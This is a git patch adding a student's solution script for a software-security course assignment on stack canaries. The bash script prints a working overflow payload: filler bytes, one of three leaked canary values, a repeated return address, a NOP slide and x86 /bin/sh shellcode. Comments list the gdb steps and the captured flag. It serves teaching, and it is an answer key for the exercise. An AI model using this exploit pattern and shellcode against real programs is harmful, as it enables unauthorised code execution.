From 731478bcdf4ffc61944aeff10197684560bc705c Mon Sep 17 00:00:00 2001 From: Sascha Tommasone Date: Sun, 23 Jun 2024 23:04:14 +0200 Subject: [PATCH] [Assignment-6] solution task 7 (stack canaries) --- .../fake_canary/solution.sh | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100755 Assignment 6 - Software Security - Teil 2/fake_canary/solution.sh diff --git a/Assignment 6 - Software Security - Teil 2/fake_canary/solution.sh b/Assignment 6 - Software Security - Teil 2/fake_canary/solution.sh new file mode 100755 index 0000000..704a065 --- /dev/null +++ b/Assignment 6 - Software Security - Teil 2/fake_canary/solution.sh @@ -0,0 +1,41 @@ +#!/bin/bash + +# flag{CANARY_IS_ALSO_AN_ISLAND} + +##### Exploit Creation Steps ##### +# Step 1: Locate address of 'int stack_canaries [10]' using gdb +# Command: disas owerflow +# -> 0x56559020 +################################## +# Step 2: Print all 10 possible stack canaries in gdb +# Command: x/10xw 0x56559020 +################################## +# Step 3: Select only those canaries that do not contain a null byte +################################## +# Step 4: Combine Slide Rider with the selected stack canaries +################################## + +############ Exploit ############## +# Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate. +# Note: Only canaries without null bytes can be used due to the use of strcpy. +case $(( RANDOM % 3 )) in + 0) + printf "AAAAAAAAAAAAAAAA\xa9\x67\xa3\x70" + ;; + 1) + printf "AAAAAAAAAAAAAAAA\xc1\xd1\xce\x4b" + ;; + 2) + printf "AAAAAAAAAAAAAAAA\x0e\x8b\xba\x08" + ;; +esac + +# Step 2: Fill the buffer with a candidate return address +printf "\x10\xd6\xff\xff%.0s" {1..30} + +# Step 3: Write a lot of NOPs to stdout as a slide for the shellcode +printf "\x90%.0s" {1..2000} + +# Step 4: Write the provided shellcode to stdout +printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" +###################################